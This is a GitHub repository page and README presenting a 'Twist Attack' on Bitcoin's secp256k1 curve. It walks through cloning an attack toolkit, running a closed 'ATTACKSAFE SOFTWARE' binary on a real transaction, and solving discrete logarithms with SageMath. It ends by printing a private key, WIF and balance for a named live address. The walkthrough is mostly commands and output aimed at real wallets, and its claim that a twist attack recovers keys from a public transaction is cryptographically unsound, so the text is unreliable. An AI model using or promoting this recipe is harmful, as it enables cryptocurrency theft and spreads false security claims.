https://github.com/demining/twist-attack-2

In this article, we will implement a Twist Attack with an example and show how, using certain points on the secp256k1 elliptic curve, we can get partial private key values ​​and restore a Bitcoin Wallet within 5-15 minutes using “Sagemath pollard rho function: (discrete_log_rho)” and “ Chinese Remainder Theorem” .
https://github.com/demining/twist-attack-2

attack attacker bitcoin bitcoin-wallet blockchain blockchain-technology cryptocurrency exploit exploiting exploiting-vulnerabilities hack hacking vulnerabilities vulnerability vulnerability-scanners

Last synced: about 20 hours ago
JSON representation

In this article, we will implement a Twist Attack with an example and show how, using certain points on the secp256k1 elliptic curve, we can get partial private key values ​​and restore a Bitcoin Wallet within 5-15 minutes using “Sagemath pollard rho function: (discrete_log_rho)” and “ Chinese Remainder Theorem” .

• Host: GitHub
• URL: https://github.com/demining/twist-attack-2
• Owner: demining
• Created: 2023-03-02T11:02:23.000Z (almost 2 years ago)
• Default Branch: main
• Last Pushed: 2023-09-09T14:15:22.000Z (over 1 year ago)
• Last Synced: 2024-11-12T21:43:05.775Z (2 months ago)
• Topics: attack, attacker, bitcoin, bitcoin-wallet, blockchain, blockchain-technology, cryptocurrency, exploit, exploiting, exploiting-vulnerabilities, hack, hacking, vulnerabilities, vulnerability, vulnerability-scanners
• Language: HTML
• Homepage: https://cryptodeeptech.ru/twist-attack-2
• Size: 4.29 MB
• Stars: 11
• Watchers: 3
• Forks: 3
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        

# Twist Attack Example №2

---

---



---

* Tutorial: https://youtu.be/pOviZOYItv4

* Tutorial: https://cryptodeeptech.ru/twist-attack-2

---



In this article, we will implement a Twist Attack using example #2, according to the first theoretical part of the article, we made sure that with the help of certain points on the secp256k1 elliptic curve, we can get partial values ​​​​of the private key and within 5-15 minutes restore a Bitcoin Wallet using the “Sagemath pollard rho function : (discrete_log_rho)” and “Chinese Remainder Theorem” .




Let’s continue with a series of ECC operations, since these certain points are maliciously chosen points on the secp256k1 elliptic curve





https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md



According to Paulo Barreto tweet: https://twitter.com/pbarreto/status/825703772382908416?s=21










The cofactor is 3^2*13^2*3319*22639








E1: 20412485227

E2: 3319, 22639

E3: 109903, 12977017, 383229727

E4: 18979

E6: 10903, 5290657, 10833080827, 22921299619447


prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447

38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031

HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5







When running a Twist Attack , the “private key” can be obtained by a certain choice of the “public key” (selected point of the secp256k1 elliptic curve), that is, the value in the transaction is revealed.After that, information about the private key will also be revealed, but for this you need to perform several ECC operations.



E1: y^2 = x^3 + 1

E2: y^2 = x^3 + 2

E3: y^2 = x^3 + 3

E4: y^2 = x^3 + 4

E6: y^2 = x^3 + 6




https://attacksafe.ru/twist-attack-on-bitcoin



y² = x³ + ax + b. In the Koblitz curve,

y² = x³ + 0x + 7. In the Koblitz curve,

0  = x³ + 0  + 7

b '= -x ^ 3 - ax.




All points (x, 0) fall on invalid curves with b '= -x ^ 3 - ax





Let’s move on to the experimental part:


(Consider a Bitcoin Address)




1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx





(Now consider critical vulnerable transactions)




https://btc1.trezor.io/tx/60918fd82894eb94c71a9c10057ffe9d8a82074426f596dcbc759d676c886ae9











Open  [TerminalGoogleColab] .


Implementing the Twist Attack algorithm using our 18TwistAttack repository


git clone https://github.com/demining/CryptoDeepTools.git


cd CryptoDeepTools/18TwistAttack/

ls










Install all the packages we need




requirements.txt




sudo apt install python2-minimal


wget https://bootstrap.pypa.io/pip/2.7/get-pip.py

sudo python2 get-pip.py

pip2 install -r requirements.txt












,







Prepare RawTX for the attack






1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx


https://btc1.trezor.io/tx/60918fd82894eb94c71a9c10057ffe9d8a82074426f596dcbc759d676c886ae9











RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000


Save in file: RawTX.txt










 To implement the attack, we will use the “ATTACKSAFE SOFTWARE” software




www.attacksafe.ru/software



Access rights:


chmod +x attacksafe










Application:


./attacksafe -help








  -version:  software version 

  -list:     list of bitcoin attacks

  -tool:     indicate the attack

  -gpu:      enable gpu

  -time:     work timeout

  -server:   server mode

  -port:     server port

  -open:     open file

  -save:     save file

  -search:   vulnerability search

  -stop:     stop at mode

  -max:      maximum quantity in mode

  -min:      minimum quantity per mode

  -speed:    boost speed for mode

  -range:    specific range

  -crack:    crack mode

  -field:    starting field

  -point:    starting point

  -inject:   injection regimen

  -decode:   decoding mode




./attacksafe -version




Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023]



"ATTACKSAFE SOFTWARE" includes all popular attacks on Bitcoin.


Let’s run a list of all attacks:


./attacksafe -list


































Let’s choose -tool: twist_attack


To get specific secp256k1 points from the vulnerable ECDSA signature transaction, we added the data  RawTX to a text document and saved it as a file RawTX.txt


01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000




Launch  -tool twist_attack using software “ATTACKSAFE SOFTWARE”





./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt
















We launched this attack from  -tool twist_attack and the result was saved to a file SecretPoints.txt


Now to see the successful result, open the file SecretPoints.txt


cat SecretPoints.txt




Result:


Elliptic Curve Secret Points:


Q11 = E1([97072073026593516785986136148833105674452542501015145216961054272876839453879, 107567253371779495307521678088935176637661904239924771700494716430774957820966])

Q21 = E2([3350296768277877304391506547616361976369787138559008027651808311357100316617, 72988900267653266243491077449097157591503403928437340215197819240911749073070])

Q22 = E2([112520741232779465095566100761481226712887911875949213866586208031790667764851, 67821409607391406974451792678186486803604797717916857589728259410989018828088])

Q31 = E3([19221018445349571002768878066568778104356611670224206148889744255553888839368, 51911948202474460182474729837629287426170495064721963100930541018009108314113])

Q32 = E3([41890177480111283990531243647299980511217563319657594412233172058507418746086, 50666391602993122126388747247624601309616370399604218474818855509093287774278])

Q33 = E3([42268931450354181048145324837791859216268206183479474730830244807012122440868, 106203099208900270966718494579849900683595613889332211248945862977592813439569])

Q41 = E4([54499795016623216633513895020095562919782606390420118477101689814601700532150, 105485166437855743326869509276555834707863666622073705127774354124823038313021])

Q61 = E6([62124953527279820718051689027867102514830975577976669973362563656149003510557, 100989088237897158673340534473118617341737987866593944452056172771683426720481])

Q62 = E6([86907281605062616221251901813989896824116536666883529138776205878798949076805, 19984923138198085750026187300638434023309806045826685297245727280111269894421])

Q63 = E6([66063410534588649374156935204077330523666149907425414249132071271750455781006, 25315648259518110320341360730017389015499807179224601293064633820188666088920])

Q64 = E6([109180854384525934106792159822888807664445139819154775748567618515646342974321, 102666617356998521143219293179463920284010473849613907153669896702897252016986])

RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000



Now let’s add the received secp256k1 points


To do this, open Python-script: discrete.py










To run Python-script: discrete.py install SageMath


















Installation command:


sudo apt-get update

sudo apt-get install -y python3-gmpy2

yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath




























Check the installation of SageMath by command: sage -v







SageMath version 9.0





To solve the discrete logarithm (Pollard's rho algorithm for logarithms)run Python-script: discrete.py








Run command:


sage -python3 discrete.py










Result:


Discrete_log_rho:


14996641256

1546

19575

31735

9071789

145517682

11552

7151

3370711

10797447604

10120546250224

PRIVATE KEY:

3160389728152122137789469305939632411648887242506549174582525524562820572318




privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64])







We solved the discrete logarithm and using the “ Chinese Remainder Theorem (Chinese remainder theorem) ” got the private key in decimal format.



Convert private key to HEX format


The decimal format of the private key has been saved to a file: privkey.txt








Run Python-script: privkey2hex.py











python3 privkey2hex.py

cat privkey2hex.txt










Let’s open the resulting file: privkey2hex.txt












Private key in HEX format:


PrivKey = 06fcb79a2eabffa519509e43b7de95bc2df15ca48fe6be29f9160bcd6ac1a49e


Let’s open  bitaddress  and check:


ADDR: 1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx

WIF:  KwTHx3AhV8qiN6qyfG1D85TGEeUBiaMUjnQ11eVLP5NAfiVNLLmS

HEX:  06FCB79A2EABFFA519509E43B7DE95BC2DF15CA48FE6BE29F9160BCD6AC1A49E














https://live.blockcypher.com/btc/address/1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx/
















BALANCE: $ 902.52




Source


ATTACKSAFE SOFTWARE


Telegram: https://t.me/cryptodeeptech


Video: https://youtu.be/pOviZOYItv4


Source: https://cryptodeeptech.ru/twist-attack-2